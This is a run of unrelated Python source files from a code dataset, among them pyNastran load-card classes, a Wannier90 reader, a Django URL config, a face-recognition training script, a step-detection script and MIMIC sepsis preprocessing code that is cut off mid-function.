safe_cross_reference(self, model, xref_errors, debug=True):\n msg = ', which is required by PLOAD4 sid=%s' % self.sid\n #self.eid = model.Element(self.eid, msg=msg)\n self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n\n #self.eid_ref = self.eid\n if self.g1 is not None:\n try:\n self.g1_ref = model.Node(self.g1, msg=msg)\n except KeyError:\n model.log.warning('Could not find g1=%s%s' % (self.g1, msg))\n\n if self.g34 is not None:\n try:\n self.g34_ref = model.Node(self.g34, msg=msg)\n except KeyError:\n model.log.warning('Could not find g34=%s%s' % (self.g34, msg))\n\n #if self.eids:\n msgia = 'Could not find element=%%s%s\\n' % msg\n self.eids_ref, msgi = model.safe_get_elements(self.eids, msg=msgia)\n if msgi:\n model.log.warning(msgi.rstrip())\n\n def uncross_reference(self):\n self.cid = self.Cid()\n if self.g1 is not None:\n self.g1 = self.G1()\n if self.g34 is not None:\n self.g34 = self.G34()\n self.eids = self.element_ids\n self.g1_ref = None\n self.g34_ref = None\n self.cid_ref = None\n self.eids_ref = None\n\n def G1(self):\n if self.g1_ref is not None:\n return self.g1_ref.nid\n return self.g1\n\n def G34(self):\n if self.g34_ref is not None:\n return self.g34_ref.nid\n return self.g34\n\n @property\n def node_ids(self):\n node_ids = [self.G1(), self.G34()]\n return node_ids\n\n def get_element_ids(self, eid=None):\n if self.eids_ref is not None:\n try:\n eids = [eid_ref.eid for eid_ref in self.eids_ref]\n except AttributeError:\n eids = []\n for eid_ref in self.eids_ref:\n if isinstance(eid_ref, integer_types):\n # Nastran is NOT OK with elements that don't actually exist in the PLOAD4\n # we do this for safe_cross_reference\n eids.append(eid)\n else:\n eids.append(eid_ref.eid)\n else:\n eids = self.eids\n return eids\n\n @property\n def element_ids(self):\n return self.get_element_ids()\n\n def repr_fields(self):\n eids = self.element_ids\n eid = eids[0]\n p1 = self.pressures[0]\n p2 = set_blank_if_default(self.pressures[1], p1)\n p3 = set_blank_if_default(self.pressures[2], p1)\n p4 = set_blank_if_default(self.pressures[3], p1)\n list_fields = ['PLOAD4', self.sid, eid, self.pressures[0], p2, p3, p4]\n\n if self.g1 is not None:\n # is it a SOLID element\n node_ids = self.node_ids\n #node_ids = self.node_ids([self.g1, self.g34])\n list_fields += node_ids\n else:\n if len(eids) > 1:\n try:\n list_fields.append('THRU')\n eidi = eids[-1]\n except:\n print(\"g1 = %s\" % self.g1)\n print(\"g34 = %s\" % self.g34)\n print(\"self.eids = %s\" % self.eids)\n raise\n list_fields.append(eidi)\n else:\n list_fields += [None, None]\n\n cid = self.Cid()\n if cid or norm(self.nvector) > 0.0:\n n1 = self.nvector[0]\n n2 = self.nvector[1]\n n3 = self.nvector[2]\n list_fields.append(cid)\n list_fields += [n1, n2, n3]\n surf_or_line = self.surf_or_line\n line_load_dir = self.line_load_dir\n else:\n list_fields += [None, None, None, None]\n surf_or_line = set_blank_if_default(self.surf_or_line, 'SURF')\n line_load_dir = set_blank_if_default(self.line_load_dir, 'NORM')\n list_fields.append(surf_or_line)\n if surf_or_line == 'LINE':\n list_fields.append(line_load_dir)\n return list_fields\n\n def raw_fields(self):\n eids = self.element_ids\n eid = eids[0]\n p1 = self.pressures[0]\n p2 = self.pressures[1]\n p3 = self.pressures[2]\n p4 = self.pressures[3]\n list_fields = ['PLOAD4', self.sid, eid, p1, p2, p3, p4]\n\n if self.g1 is not None:\n # is it a SOLID element\n node_ids = self.node_ids\n #node_ids = self.node_ids([self.g1, self.g34])\n list_fields += node_ids\n else:\n if len(eids) > 1:\n try:\n list_fields.append('THRU')\n eidi = eids[-1]\n except:\n print(\"g1 = %s\" % self.g1)\n print(\"g34 = %s\" % self.g34)\n print(\"self.eids = %s\" % self.eids)\n raise\n list_fields.append(eidi)\n else:\n list_fields += [None, None]\n\n cid = self.Cid()\n if cid or norm(self.nvector) > 0.0:\n n1 = self.nvector[0]\n n2 = self.nvector[1]\n n3 = self.nvector[2]\n list_fields.append(cid)\n list_fields += [n1, n2, n3]\n else:\n list_fields += [None, None, None, None]\n\n surf_or_line = self.surf_or_line\n line_load_dir = self.line_load_dir\n list_fields.append(surf_or_line)\n if surf_or_line == 'LINE':\n list_fields.append(line_load_dir)\n return list_fields\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card (8/16)\n \"\"\"\n card = self.repr_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n return self.comment + print_card_16(card)\n\n\nclass PLOADX1(BaseCard):\n \"\"\"\n Pressure Load on Axisymmetric Element\n\n Defines surface traction to be used with the CQUADX, CTRIAX, and CTRIAX6\n axisymmetric element.\n\n +---------+-----+-----+----+----+----+----+-------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +=========+=====+=====+====+====+====+====+=======+\n | PLOADX1 | SID | EID | PA | PB | GA | GB | THETA |\n +---------+-----+-----+----+----+----+----+-------+\n \"\"\"\n type = 'PLOADX1'\n\n def __init__(self, sid, eid, pa, nids, pb=None, theta=0., comment=''):\n \"\"\"\n Creates a PLOADX1 card, which defines surface traction for\n axisymmetric elements.\n\n Parameters\n ----------\n sid : int\n load id\n eid : int\n element id (CQUADX, CTRIAX, or CTRIAX6)\n nids : List[int, int]\n Corner grid points.\n GA and GB are any two adjacent corner grid points of the element\n pa / pb : float / None\n Surface traction at grid point GA or GB\n pb : default is None -> pa\n theta : float; default=0.0\n Angle between surface traction and inward normal to the line\n segment.\n comment : str; default=''\n a comment for the card\n \"\"\"\n BaseCard.__init__(self)\n if comment:\n self.comment = comment\n if pb is None:\n pb = pa\n self.sid = sid\n self.eid = eid\n self.pa = pa\n self.pb = pb\n self.ga = nids[0]\n self.gb = nids[1]\n self.theta = theta\n self.eid_ref = None\n self.ga_ref = None\n self.gb_ref = None\n\n def validate(self):\n assert isinstance(self.ga, integer_types), 'ga=%r' % self.ga\n assert isinstance(self.gb, integer_types), 'gb=%r' % self.gb\n assert isinstance(self.pa, float), 'pa=%r' % self.pa\n assert isinstance(self.pb, float), 'pb=%r' % self.pb\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a PLOADX1 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n pa = double(card, 3, 'pa')\n pb = double_or_blank(card, 4, 'pb', pa)\n ga = integer(card, 5, 'ga')\n gb = integer(card, 6, 'gb')\n theta = double_or_blank(card, 7, 'theta', 0.)\n assert len(card) <= 8, 'len(PLOADX1 card) = %i\\ncard=%s' % (len(card), card)\n nids = [ga, gb]\n return PLOADX1(sid, eid, pa, nids, pb=pb, theta=theta, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a PLOADX1 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid, eid, pa, pb, ga, gb, theta = data\n nids = [ga, gb]\n return PLOADX1(sid, eid, pa, nids, pb=pb, theta=theta, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by PLOADX1 lid=%s' % self.sid\n self.eid_ref = model.Element(self.eid, msg=msg)\n self.ga_ref = model.Node(self.ga, msg=msg)\n self.gb_ref = model.Node(self.gb, msg=msg)\n\n @property\n def node_ids(self):\n return [self.Ga(), self.Gb()]\n\n @property\n def nodes(self):\n return [self.ga, self.gb]\n\n @property\n def nodes_ref(self):\n return [self.ga_ref, self.gb_ref]\n\n def safe_cross_reference(self, model, safe_coord):\n return self.cross_reference(model)\n\n def uncross_reference(self):\n self.eid = self.Eid()\n self.ga = self.Ga()\n self.gb = self.Gb()\n self.eid_ref = None\n self.ga_ref = None\n self.gb_ref = None\n\n def Eid(self):\n if self.eid_ref is not None:\n return self.eid_ref.eid\n return self.eid\n\n def Ga(self):\n if self.ga_ref is not None:\n return self.ga_ref.nid\n return self.ga\n\n def Gb(self):\n if self.gb_ref is not None:\n return self.gb_ref.nid\n return self.gb\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = [\n 'PLOADX1', self.sid, self.Eid(), self.pa, self.pb,\n self.Ga(), self.Gb(), self.theta]\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card (8/16)\n \"\"\"\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\ndef normalize(self, msg=''):\n \"\"\"\n adjust the vector to a unit length\n scale up the magnitude of the vector\n \"\"\"\n assert abs(self.mag) > 0, 'mag=%s\\n%s' % (self.mag, self)\n if abs(self.mag) != 0.0: # enforced displacement\n norm_xyz = norm(self.xyz)\n if norm_xyz == 0.0:\n raise RuntimeError('xyz=%s norm_xyz=%s' % (self.xyz, norm_xyz))\n #mag = self.mag * norm_xyz\n self.mag *= norm_xyz\n try:\n self.xyz = self.xyz / norm_xyz\n except FloatingPointError:\n msgi = 'xyz = %s\\n' % self.xyz\n msgi += 'norm_xyz = %s\\n' % norm_xyz\n msgi += 'card =\\n%s' % str(self)\n msgi += msg\n raise FloatingPointError(msgi)\n\n\n#def normalize(self):\n #\"\"\"\n #adjust the vector to a unit length\n #scale up the magnitude of the vector\n #\"\"\"\n #if self.mag != 0.0: # enforced displacement\n #norm_xyz = norm(self.xyz)\n ##mag = self.mag*norm_xyz\n #self.mag *= norm_xyz\n #self.xyz /= norm_xyz\n","repo_name":"mtnakayama/pyNastran","sub_path":"pyNastran/bdf/cards/loads/static_loads.py","file_name":"static_loads.py","file_ext":"py","file_size_in_byte":99370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"38381384135","text":"from django.urls import path\nfrom Doctor.views import *\n\n\nurlpatterns = [\n path('',dummy,name='dummy'),\n path('doctor_view/',doctor_view,name='doctor_view'),\n path('show_appointment',show_appointment,name='show_appointment'),\n \n path('confirm_booking/',confirm_booking,name='confirm_booking')\n]","repo_name":"Abshar12/Hosptal_Management_System","sub_path":"Doctor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25808213846","text":"import numpy as np\n\nclass Wannier90:\n def __init__(self, parms):\n f = open(parms['Wannier90_hr'])\n f.readline()\n self.Nwann = int(f.readline())\n self.nrpts = int(f.readline())\n\n num_lines = self.nrpts/15\n if self.nrpts%15 != 0:\n num_lines += 1\n ndgen = []\n for iline in xrange(num_lines):\n ndgen.extend(f.readline().split())\n ndgen = np.array(ndgen, dtype=int)\n\n self.HamR = np.zeros((self.nrpts, self.Nwann, self.Nwann), dtype=complex)\n self.irvec = np.zeros((self.nrpts, 3), dtype=int)\n for ir in xrange(self.nrpts):\n for i in xrange(self.Nwann):\n for j in xrange(self.Nwann):\n i1,i2,i3,i4,i5,r1,r2 = f.readline().split()\n self.HamR[ir, int(i4)-1,int(i5)-1] = (float(r1) + 1J * float(r2))/(1.*ndgen[ir]) \n self.irvec[ir,0] = i1\n self.irvec[ir,1] = i2\n self.irvec[ir,2] = i3\n\n self.HamR = self.HamR.reshape((self.nrpts, 2, self.Nwann/2, 2, self.Nwann/2)).transpose((0,2,1,4,3)).reshape((self.nrpts, self.Nwann, self.Nwann))\n \n def get_Hk(self, kvec):\n Hk = np.zeros((self.Nwann,self.Nwann,),dtype=complex)\n for iR in range(self.nrpts):\n Hk += self.HamR[iR,:,:]*np.exp(2J*np.pi*(self.irvec[iR,0]*kvec[0]+self.irvec[iR,1]*kvec[1]+self.irvec[iR,2]*kvec[2]))\n return Hk\n","repo_name":"ALPSCore/pyDMFT","sub_path":"wannier90.py","file_name":"wannier90.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"43930886414","text":"\"\"\"Advent of Code 2022-12-02\"\"\"\r\n\r\nabc = ('A', 'B', 'C')\r\nxyz = ('X', 'Y', 'Z')\r\npts = (1, 2, 3)\r\nrel = (1, 2, 0)\r\n\r\nwith open(\"aoc02-1.txt\", \"r\", encoding = \"utf-8\") as file:\r\n lines = [l.strip() for l in file.readlines()]\r\n\r\nrounds_alpha = [l.split() for l in lines]\r\n\r\nrounds = [(abc.index(a), xyz.index(x)) for a, x in rounds_alpha]\r\nprint(f\"{rounds!r}\")\r\n\r\nscore = 0\r\n\r\nfor r in rounds:\r\n a, x = r\r\n p = pts[x]\r\n w = rel[x - a]\r\n s = p + w * 3\r\n print(f\"{a} {x} -> {s}\\n\")\r\n score += s\r\n\r\nprint(f\"{score}\\n\")\r\n","repo_name":"f382/AdventOfCode","sub_path":"2022/aoc02_0.py","file_name":"aoc02_0.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32514095895","text":"# scrap a movie website and get the 'trendings' list\nimport requests\nfrom bs4 import BeautifulSoup as BS\nURL = \"https://goku.sx/home\"\n\nresponse = requests.get(URL)\ncontents = BS(response.text, 'html.parser')\ncontainer = contents.find('div', class_='tab-pane show active')\nitems = container.find_all('div', class_='item')\n\nfor item in items:\n name = item.find('h3', class_='movie-name')\n names = name.text\n with open('movie_list.txt', 'a', encoding=None) as f:\n f.writelines(f'{names}\\n')\n","repo_name":"Awwal12/python_class","sub_path":"In-Class_Assessment/12th_july/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42468395286","text":"import os\nfrom PIL import Image\nimport numpy as np\nimport pickle\nimport cv2\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nimage_dir = os.path.join(BASE_DIR, \"faces_gray_crop\")\n\ncurrent_id = 0\nlabel_ids = {}\ny_labels = []\nx_train = []\nsize = (100, 100)\n\nfor root, dirs, files in os.walk(image_dir):\n for file in files:\n if file.endswith(\"png\") or file.endswith(\"jpg\"):\n path = os.path.join(root, file)\n label = os.path.basename(root).replace(\" \", \"-\").lower()\n if label in label_ids:\n pass\n else:\n label_ids[label] = current_id\n current_id += 1\n id_ = label_ids[label]\n # print(label_ids)\n\n image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n image = cv2.resize(image, size)\n image_array = np.array(image, \"uint8\")\n\n x_train.append(image_array)\n y_labels.append(id_)\n\ndata = (x_train, y_labels)\nprint(np.array(x_train).shape)\nwith open(\"data.pickle\", \"wb\") as f:\n pickle.dump(data, f)\n\nprint(label_ids)\n\nwith open(\"labels.pickle\", 'wb') as f:\n pickle.dump(label_ids, f)\n","repo_name":"phamthientan272/Face_Recognition","sub_path":"prepare_training_data.py","file_name":"prepare_training_data.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21652212207","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\n\nimport tensorflow as tf\nimport tensorboard as tb\n\n\nSTANDARD_PLUGINS = frozenset([\n 'audio',\n 'custom_scalar',\n 'histogram',\n 'image',\n 'pr_curve',\n 'scalar',\n 'text',\n])\n\n\nclass SummaryExportsTest(tf.test.TestCase):\n\n def test_each_plugin_has_an_export(self):\n for plugin in STANDARD_PLUGINS:\n self.assertIsInstance(getattr(tb.summary, plugin), collections.Callable)\n\n def test_plugins_export_pb_functions(self):\n for plugin in STANDARD_PLUGINS:\n self.assertIsInstance(\n getattr(tb.summary, '%s_pb' % plugin), collections.Callable)\n\n def test_all_exports_correspond_to_plugins(self):\n exports = [name for name in dir(tb.summary) if not name.startswith('_')]\n futures = frozenset(('absolute_import', 'division', 'print_function'))\n bad_exports = [\n name for name in exports\n if name not in futures and not any(\n name == plugin or name.startswith('%s_' % plugin)\n for plugin in STANDARD_PLUGINS)\n ]\n if bad_exports:\n self.fail(\n 'The following exports do not correspond to known standard '\n 'plugins: %r. Please mark these as private by prepending an '\n 'underscore to their names, or, if they correspond to a new '\n 'plugin that you are certain should be part of the public API '\n 'forever, add that plugin to the STANDARD_PLUGINS set in this '\n 'module.' % bad_exports)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"dunkelhaus/cancerTherapy","sub_path":"modules/HTTPRequest/projector/mnist-tensorboard-embeddings/tensorboard/tensorboard/summary_test.py","file_name":"summary_test.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"72693558880","text":"import re\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nsdkData = []\n\n\ndef getdata():\n if len(sdkData) == 0:\n with open('./testcase/sdkInfo') as fileData:\n info = []\n data = fileData.read().splitlines()\n for line in data:\n linedata = line.strip().split()\n if re.match(r'\\d{13}.*', linedata[0]) and linedata[1] != 'TYPE_WIFI':\n info.append(linedata)\n for i in range(0, len(info), 4):\n b = info[i: i+4]\n datadict = {}\n for item in b:\n datadict['time'] = item[0]\n datadict[item[1]] = item[2: 5]\n sdkData.append(datadict)\n return sdkData\n\n\ndef callistsumbyindex(start, end, array):\n sum = 0\n index = start\n while start <= index <= end:\n sum += array[index]\n index += 1\n return sum\n\n\ndef smoothacc(accs, width=19):\n length = len(accs) - 1\n halfW = width / 2\n targets = []\n for index, item in enumerate(accs):\n acc = 0\n if index < halfW:\n end = index * 2 + 1\n acc = callistsumbyindex(0, end, accs) / (end + 1)\n elif index < length - halfW:\n acc = callistsumbyindex(index - halfW, index + halfW, accs) / width\n elif index < length:\n acc = callistsumbyindex(index * 2 - length, length, accs) / (2 * (length - index) + 1)\n else:\n acc = item\n targets.append(acc)\n return targets\n\n\ndef findpace(list, times):\n minpeak = 10.5\n minvalley = 8.8\n timewindow = 0.2\n lastpeak = {\n 'time': 0,\n 'acc': 0,\n }\n lastvalley = {\n 'time': 0,\n 'acc': 0,\n }\n pace = []\n for index, item in enumerate(list):\n time = int(times[index])\n left = 0\n right = 0\n if 0 < index < len(list) - 1:\n left = list[index - 1]\n right = list[index + 1]\n if item > minpeak \\\n and time - lastpeak['time'] > timewindow\\\n and left < item < right:\n pace.append(item)\n lastpeak['time'] = time\n lastpeak['acc'] = item\n elif item < minvalley \\\n and time - lastvalley['time'] > timewindow\\\n and left > item > right:\n pace.append(item)\n lastvalley['time'] = time\n lastvalley['acc'] = item\n stepLens = []\n i = 0\n a = 0.8\n b = 0.2\n while i < len(pace) - 1:\n peak = max(pace[i], pace[i + 1])\n vallley = min(pace[i], pace[i + 1])\n pv = peak - vallley\n step = a * pow(pv, 1 / 4) + b * math.log(pv, math.e)\n stepLens.append(step)\n i += 2\n return stepLens\n\n\ndef handlegyros(gyroscopes, times):\n gyroeds = []\n time = 0\n for index, item in enumerate(gyroscopes):\n [wx, wy, wz] = item\n timecurrent = int(times[index])\n ww = pow((pow(float(wx), 2) + pow(float(wy), 2) + pow(float(wz), 2)), 0.5) * (timecurrent - time)\n time = timecurrent\n sinW = math.sin(ww / 2) / ww\n [q0, q1, q2, q3] = [math.cos(ww / 2), wx * sinW, wy * sinW, wz * sinW]\n RM = np.array([\n [1 - 2 * (q2 * q2 + q3 * q3), 2 * (q1 * q2 - q0 * q3), 2 * (q1 * q2 + q0 * q3)],\n [2 * (q1 * q2 + q0 * q3), 1 - 2 * (q1 * q1 + q3 * q3), 2 * (q2 * q3 - q0 * q1)],\n [2 * (q1 * q3 - q0 * q2), 2 * (q2 * q3 + q0 * q1), 1 - 2 * (q1 * q1 + q2 * q2)]])\n gyroeds.append(RM)\n return gyroeds\n\n\ndef main():\n datas = getdata()\n accList = []\n timelist = []\n gyroscopes = []\n for item in datas:\n accs = item.get('TYPE_ACCELEROMETER')\n acced = 0\n for acc in accs:\n acced += pow(float(acc), 2)\n acced = pow(acced, 0.5)\n timelist.append(item.get('time'))\n# gyroscopes.append(item.get('TYPE_GYROSCOPE'), item.get('time'))\n accList.append(acced)\n # find peak valley\n accssmoothed = smoothacc(accList)\n paces = findpace(accssmoothed, timelist)\n plt.plot(paces, label='pace')\n plt.legend()\n plt.show()\n\nmain()\n\n","repo_name":"bobwen13579/pdr-algo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71106004003","text":"\"\"\"\nThis file contains functions that are used as preprocessing steps of the features of the MIMIC dataset\nThey modify the pandas dataframe containing the data\nSee one of the notebook to have a working example\n\"\"\"\nimport pandas as pd\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import StandardScaler\n\n\nbinary_columns = ['gender',\n 're_admission',\n 'rrt',\n 'mechvent',\n 'sedation'\n ]\nbinary_actions_columns = [\n 'rrt',\n 'mechvent',\n 'sedation'\n]\nbinary_features_columns = [\n 'gender',\n 're_admission'\n]\nnumerical_columns_to_be_logged = ['age',\n 'Weight_kg',\n 'SpO2',\n 'SGOT',\n 'SGPT',\n 'Total_bili',\n 'WBC_count',\n 'Platelets_count',\n 'PTT',\n 'PT',\n 'INR',\n 'paO2',\n 'paCO2',\n 'Arterial_lactate',\n 'PaO2_FiO2',\n # 'input_total_tev',\n 'output_total'\n ] # 'cumulated_balance_tev']\nnumerical_columns_not_to_be_logged = ['SIRS',\n 'elixhauser',\n 'SOFA',\n 'FiO2_1',\n 'GCS',\n 'HR',\n 'SysBP',\n 'Arterial_BE',\n 'MeanBP',\n 'DiaBP',\n 'Shock_Index',\n 'RR',\n 'SpO2',\n 'Temp_C',\n 'Potassium',\n 'Sodium',\n 'Chloride',\n 'Glucose',\n 'BUN',\n 'Creatinine',\n 'Magnesium',\n 'Calcium',\n 'Ionised_Ca',\n 'CO2_mEqL',\n 'Albumin',\n 'Hb',\n 'Arterial_pH',\n 'Arterial_BE',\n 'HCO3']\naction_cols = ['max_dose_vaso', 'input_4hourly_tev']\nlog_action_cols = ['log_vaso', 'log_fluid']\n\n\ndef split_train_test_idx(data, train_prop=.95):\n ids = shuffle(data.icustayid.unique())\n return ids[:int(train_prop * ids.shape[0])], ids[int(train_prop * ids.shape[0]):]\n\n\ndef compute_action_quantiles(data):\n quantiles_fluid = {q: np.percentile(data.input_4hourly_tev.loc[data.input_4hourly_tev > 0].apply(np.log), q) for q\n in [25, 50, 75]}\n quantiles_vaso = {q: np.percentile(data.max_dose_vaso.loc[data.max_dose_vaso > 0].apply(np.log), q) for q in\n [25, 50, 75]}\n return quantiles_fluid, quantiles_vaso\n\n\ndef quantized_actions(fluid, vaso, quantiles_fluid, quantiles_vaso):\n \"\"\"Divide the possible actions in 25 categories\"\"\"\n if fluid == 0:\n i = 0\n else:\n if np.log(fluid) <= quantiles_fluid[25]:\n i = 1\n if quantiles_fluid[25] < np.log(fluid) <= quantiles_fluid[50]:\n i = 2\n if quantiles_fluid[50] < np.log(fluid) <= quantiles_fluid[75]:\n i = 3\n if quantiles_fluid[75] < np.log(fluid):\n i = 4\n if vaso == 0:\n j = 0\n else:\n if np.log(vaso) <= quantiles_vaso[25]:\n j = 1\n if quantiles_vaso[25] < np.log(vaso) <= quantiles_vaso[50]:\n j = 2\n if quantiles_vaso[50] < np.log(vaso) <= quantiles_vaso[75]:\n j = 3\n if quantiles_vaso[75] < np.log(vaso):\n j = 4\n return i + 5 * j\n\n\ndef create_action_column(data):\n quantiles_fluid, quantiles_vaso = compute_action_quantiles(data)\n actions = []\n for t in data[['input_4hourly_tev', 'max_dose_vaso']].itertuples():\n fluid = t.input_4hourly_tev\n vaso = t.max_dose_vaso\n actions.append(quantized_actions(fluid, vaso, quantiles_fluid, quantiles_vaso))\n\n data['action'] = pd.Series(actions, index=data.index)\n data.action = data.action.apply(int)\n\n\ndef add_small_quantities(data):\n # adding small quantities to each zeros logged value. These values were chosen to be 50-100 times smaller than the lowest nonzero value\n data.Total_bili += 1e-4\n data.SGOT += 1e-2\n data.SGPT += 1e-2\n data.input_total_tev += 1e-3\n data.output_total += 1e-2\n data.PaO2_FiO2 += 1e-1\n data.Arterial_lactate += 1e-3\n data.PTT += 1e-1\n data.INR += 1e-3\n data.paCO2 += 1e-1\n data.paO2 += 1e-1\n\n\ndef add_relative_time_column(data):\n # add a column containing the time in hours since arrival\n relative_times = []\n patients = set()\n for t in data[['icustayid', 'charttime']].itertuples():\n time = t.charttime\n patient = t.icustayid\n if patient not in patients:\n start_time = time\n patients.add(patient)\n relative_times.append((time - start_time) / 3600)\n data['relative_time'] = pd.Series(relative_times, index=data.index)\n return data\n\n\ndef drop_patients_with_unrealistic_HR_or_BP(data):\n patients_to_drop = data[(data.HR == 8) | (data.DiaBP < 0)].icustayid.unique()\n data = data.loc[~data.icustayid.isin(patients_to_drop)]\n return data\n\n\ndef replace_absurd_temperatures(data):\n data.loc[data.Temp_C < 33, 'Temp_C'] = 37\n\n\ndef drop_patients_with_absurd_weights(data):\n return data.loc[~data.icustayid.isin(data.loc[data.Weight_kg < 20].icustayid.unique())]\n\n\ndef drop_patient_with_negative_input(data):\n return data.loc[~data.icustayid.isin(data.loc[data.input_total_tev < 0].icustayid.unique())]\n\n\ndef add_log_actions(data):\n eps_vaso = data.loc[data.max_dose_vaso>0][['max_dose_vaso']].values.min()\n eps_fluid = data.loc[data.input_4hourly_tev>0][['input_4hourly_tev']].values.min()\n data['log_vaso'] = data.max_dose_vaso.apply(lambda x: np.log(x*(x>0) + (x==0)*eps_vaso))\n data['log_fluid'] = data.input_4hourly_tev.apply(lambda x: np.log(x*(x>0) + (x==0)*eps_fluid))\n\n\ndef matrify_histories(data, idx, scaler, log_scaler, action_scaler, T=25, verbose=True, log_action=True):\n \"\"\"\n Transform the Pandas dataset into numpy arrays that can be used to train a neural network\n :param data: a dataframe containing the sepsis dataset\n :param idx: the values of `icustayid` we want to filter on (typically to extract a train and a test set)\n :param scaler: the sklearn.preprocessing.StandardScaler that scales the numerical values\n :param log_scaler: the sklearn.preprocessing.StandardScaler that scales the numerical logged values\n :param verbose: whether to print stuff or not\n :return: several 3d arrays, with the first dimension (the number of patients selected by idx)\n - X_bin: the values of the binary columns, X_num, X_action, X_finished, X_alive\n - X_num: the numerical values\n - X_action: the action that were taken\n - X_finished : an array containing a 1 at the final timestep\n - X_alive: an array that is 1 while the patient is alive and gets 0 at the end\n \"\"\"\n n_cols = len(binary_columns) + len(numerical_columns_not_to_be_logged) + len(numerical_columns_to_be_logged)\n n = idx.shape[0]\n\n X_action_bin = np.zeros((n, T, len(binary_actions_columns))) # rrt, sedation, mechvent\n X_features_bin = np.zeros((n, len(binary_features_columns))) # gender, re_admission\n X_num = np.zeros((n, T, n_cols - len(binary_columns)))\n X_action = np.zeros((n, T, 2))\n X_finished = np.zeros((n, T, ))\n X_alive = np.zeros((n, T, ))\n\n if verbose:\n iterator = tqdm(enumerate(data.loc[data.icustayid.isin(idx)].groupby('icustayid')))\n else:\n iterator = enumerate(data.loc[data.icustayid.isin(idx)].groupby('icustayid'))\n for k, (idx, df) in iterator:\n x_action_bin = df[binary_actions_columns].values\n x_features_bin = df[binary_features_columns].values[0]\n x_num_not_logged = scaler.transform(df[numerical_columns_not_to_be_logged])\n x_num_logged = log_scaler.transform(np.log(df[numerical_columns_to_be_logged]))\n x_num = np.concatenate([x_num_not_logged, x_num_logged], -1)\n if log_action:\n actions = action_scaler.transform(df[log_action_cols].values)\n else:\n actions = action_scaler.transform(df[action_cols].values)\n finished = np.zeros((T, ))\n finished[len(df) - 1:] = 1\n alive = np.ones((T, ))\n if df[['mortality_90d']].iloc[0].values[0] == 1:\n # alive[T-1:] = 0\n if df[['died_in_hosp']].iloc[0].values[0] == 1:\n alive[len(df) - 1:] = 0\n else:\n alive[len(df):] = 0\n\n # pad with zeros\n x_action_bin = np.concatenate([x_action_bin, np.zeros((T - len(df), len(binary_actions_columns)))], 0)\n x_num = np.concatenate([x_num, np.zeros((T - len(df), n_cols - len(binary_columns)))], 0)\n actions = np.concatenate([actions, np.zeros((T - len(df), 2))], 0)\n\n # k-th history\n X_action_bin[k] = x_action_bin\n X_features_bin[k] = x_features_bin\n X_num[k] = x_num\n X_action[k] = actions\n X_finished[k] = finished\n X_alive[k] = alive\n\n return \n\n\ndef transition_iterator(data, idx=None, scaler=StandardScaler(), log_scaler=StandardScaler(), action_scaler=StandardScaler(), RMAX=15, log_action=True):\n \"\"\"\n Put the dataset in form of a list of transition (s,a,r,s')\n :param data: the pandas dataframe containing the sepsis dataset\n :param idx: the icustayids of the patients you want to consider (for example for split into train and test set). If None, returns the entire dataset\n :param scaler: (sklearn.preprocessing.StandardScaler)\n the scaler of the numerical features that are not logged. It should be already fitted\n :param log_scaler: (sklearn.preprocessing.StandardScaler)\n the scaler of the logged numerical features. It should already be fitted\n :param action_scaler: (sklearn.preprocessing.StandardScaler)\n the scaler of the actions. It should already be fitted\n :param RMAX: the max reward\n :param log_action: whether to extract take the logged or the normal actions\n :return:\n \"\"\"\n TRANSITIONS = []\n \n if idx is None:\n iterator = enumerate(data.groupby('icustayid'))\n else: \n iterator = enumerate(data.loc[data.icustayid.isin(idx)].groupby('icustayid'))\n for k, (idx, df) in 